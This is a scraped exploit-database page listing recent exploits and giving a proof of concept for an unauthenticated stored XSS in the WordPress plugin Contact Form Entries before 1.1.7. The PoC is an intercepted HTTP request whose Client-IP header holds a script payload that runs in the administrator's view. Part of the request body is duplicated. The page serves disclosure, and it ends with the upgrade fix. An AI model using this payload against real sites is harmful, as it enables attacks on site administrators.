
32 changes to exploits/shellcodes Siemens S7 Layer 2 - Denial of Service (DoS) TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Automox Agent 32 - Local Privilege Escalation ConnectWise Control 19.2.24707 - Username Enumeration Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) AWebServer GhostBuilding 18 - Denial of Service (DoS) TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) Dixell XWEB 500 - Arbitrary File Write Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) CMSimple 5.4 - Cross Site Scripting (XSS) RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated) RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) Nettmp NNT 5.1 - SQLi Authentication Bypass Hostel Management System 2.1 - Cross Site Scripting (XSS) Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) Hospitals Patient Records Management System 1.0 - Account TakeOver Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) Vodafone H-500-s 3.5.10 - WiFi Password Disclosure openSIS Student Information System 8.0 - 'multiple' SQL Injection Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS) WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
84 lines
No EOL
3.2 KiB
Text
84 lines
No EOL
3.2 KiB
Text
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
|
|
# Date: 22/12/2021
|
|
# Exploit Author: gx1 <gaetano.perrone[at]secsi.io>
|
|
# Vulnerability Discovery: Gaetano Perrone
|
|
# Vendor Homepage: https://www.crmperks.com/
|
|
# Software Link: https://wordpress.org/plugins/contact-form-entries/
|
|
# Version: < 1.1.7
|
|
# Tested on: any
|
|
|
|
# References:
|
|
|
|
* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
|
|
* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/
|
|
|
|
# Description:
|
|
Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting
|
|
|
|
# Technical Details and Exploitation:
|
|
|
|
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
|
|
When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user:
|
|
===============================================================================================================
|
|
public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
|
|
==============================================================================================================
|
|
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database.
|
|
|
|
|
|
# Proof Of Concept:
|
|
|
|
Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header
|
|
===============================================================================================================
|
|
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
|
|
Host: dsp.com:11080
|
|
Content-Length: 1411
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
X-Requested-With: XMLHttpRequest
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
|
|
Client-IP: <img src=a onerror=alert(1)>
|
|
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
|
|
Content-Disposition: form-data; name="_wpcf7"
|
|
|
|
10
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
Content-Disposition: form-data; name="_wpcf7_version"
|
|
|
|
5.3.1
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
Content-Disposition: form-data; name="_wpcf7_locale"
|
|
|
|
en_US
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
Content-Disposition: form-data; name="_wpcf7_unit_tag"
|
|
|
|
wpcf7-f10-p13-o1
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
Content-Disposition: form-data; name="_wpcf7_container_post"
|
|
|
|
Content-Disposition: form-data; name="_wpcf7"
|
|
|
|
10
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
Content-Disposition: form-data; name="_wpcf7_version"
|
|
|
|
5.3.1
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
Content-Disposition: form-data; name="_wpcf7_locale"
|
|
|
|
en_US
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
Content-Disposition: form-data; name="_wpcf7_unit_tag"
|
|
|
|
wpcf7-f10-p13-o1
|
|
------WebKitFormBoundaryCuNGXLnhRsdglEAx
|
|
Content-Disposition: form-data; name="_wpcf7_container_post"
|
|
...
|
|
===============================================================================================================
|
|
The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.
|
|
When the administrator clicks on the entry element in the plugin, the XSS is triggered.
|
|
|
|
|
|
# Solution:
|
|
Upgrade Contact Form Entries to version 1.1.7 |